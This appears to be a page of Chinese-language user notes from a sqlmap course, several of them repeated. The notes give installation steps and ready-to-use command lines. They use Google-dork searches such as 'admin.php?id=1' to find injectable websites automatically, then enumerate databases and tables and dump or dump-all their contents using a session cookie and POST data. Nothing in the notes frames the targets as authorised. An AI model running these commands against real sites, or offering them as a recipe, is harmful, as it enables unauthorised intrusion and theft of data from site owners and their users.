-
sqlmap 自动寻找注入点-g 需要谷歌能访问 sqlmap -g "inurl:域名" 或者 sqlmap -g "域名" sqlmap -g "admin.php?id=1" 好的关键字能更好地匹配,加上--batch --smart 实现自动化查看全部
-
sqlmap.py -u "http://刚才的网址" --cookie=""查看全部
-
sqlmap 命令中文翻译查看全部
-
sqlmap -u "url去掉#" --cookie="cookie值" --dbs 检测数据库 sqlmap -u "url去掉#" --cookie="cookie值" --tables 检测数据表 sqlmap -u "url去掉#" --cookie="cookie值" --dump 数据库转存 sqlmap -u "url去掉#" --cookie="cookie值" --dump-all sqlmap -u "url去掉#" --cookie="cookie值" -D 指定的数据库 --dump sqlmap -u "url去掉#" --cookie="cookie值" --D 指定的数据库 -T 指定的数据表 --dump查看全部
-
1、基于python2.7
2、下载sqlmap源码--
①官网下载zip文件
②添加环境变量(path)
②cmd--sqlmap.py(验证是否安装成功)
查看全部 -
python sqlmap.py -g "关键词"
查看全部 -
sqlmap 自动寻找注入点-g 需要谷歌能访问 sqlmap -g "inurl:域名" 或者 sqlmap -g "域名" sqlmap -g "admin.php?id=1" 好的关键字能更好地匹配,加上--batch --smart 实现自动化
查看全部 -
sqlmap -u "url去掉#" --cookie="cookie值" --dbs 检测数据库 sqlmap -u "url去掉#" --cookie="cookie值" --tables 检测数据表 sqlmap -u "url去掉#" --cookie="cookie值" --dump 数据库转存
查看全部 -
下载python 2.7版本 以及 sqlmap
注意:sqlmap仅支持python2.7
1.再配置sqlmap环境变量
2.cmd执行sqlmap.py
查看全部 -
cmd中输入sqlmap.py不行的话,输入python sqlmap.py查看全部
-
sqlmap.py -u "url" --cookie="cookie值" --dbs 检测所有数据库 sqlmap.py -u "url" --cookie="cookie值" --tables 检测所有数据库下的所有数据表 sqlmap.py -u "url" --cookie="cookie值" --dump 数据库转存 sqlmap.py -u "url" --cookie="cookie值" --dump-all sqlmap.py -u "url" --cookie="cookie值" -D 指定的数据库 --dump sqlmap.py -u "url" --cookie="cookie值" --D 指定的数据库 -T 指定的数据表 --dump --tables 枚举数据库中的表名称查看全部
-
在cmd界面,使用cd命令切换目录,使用dir查看目录下的文件,然后可以使用cd sql+Tab键补全文件名查看全部
-
下载url:https://www.python.org/ sqlmap源码:http://sqlmap.org/ 解压后发到文件夹下,复制地址,添加到环境变量中; 打开cmd界面,输入sqlmap.py 回车,安装成功查看全部
-
post请求做测试: sqlmap -u "url" --cookie="" --data="formdata源码" --dbs 通过模板文件注入 sqlmap -l 模板路径 --batch --smart查看全部
-
sqlmap -u "url去掉#" --cookie="cookie值" --dbs 检测数据库 sqlmap -u "url去掉#" --cookie="cookie值" --tables 检测数据表 sqlmap -u "url去掉#" --cookie="cookie值" --dump 数据库转存 sqlmap -u "url去掉#" --cookie="cookie值" --dump-all sqlmap -u "url去掉#" --cookie="cookie值" -D 指定的数据库 --dump sqlmap -u "url去掉#" --cookie="cookie值" --D 指定的数据库 -T 指定的数据表 --dump --tables 枚举数据库中的表名称查看全部
举报
0/150
提交
取消